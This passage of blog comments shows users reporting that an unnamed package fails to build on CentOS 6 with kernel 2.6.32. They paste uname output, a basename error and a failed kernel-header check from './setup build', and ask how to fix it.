    Hi. I tested this on CentOS 6.3 (64bit) running 2.6.32 and it didn’t work; on CentOS 6.2 (32bit) it is OK.

    Last login: Fri Mar 2 19:32:48 2012
    /bin/basename: missing operand
    Try `/bin/basename --help' for more information.

    Why?

  50.
    tirher Says:

    I have this kernel:

    # uname -a
    Linux redes-seguridad.com.ar 2.6.32-220.el6.i686 #1 SMP Tue Dec 6 16:15:40 GMT 2011 i686 i686 i386 GNU/Linux

    In centos:

    # cat /etc/issue
    CentOS release 6.3 (Final)
    Kernel \r on an \m

    And when I run this, I obtain an error:

    # ./setup build
    Checking for Kernel Header : [NOT OK] – Please Install!

    How can I fix this? I tried installing kernel-headers, but it did not work.

    Tnks

  51.
    aerosmith Says:

    help me,
    my problem is the same: “How can i fix this? I try installing kernel-headers, but not work.”

    How do I fix it?
    thanks
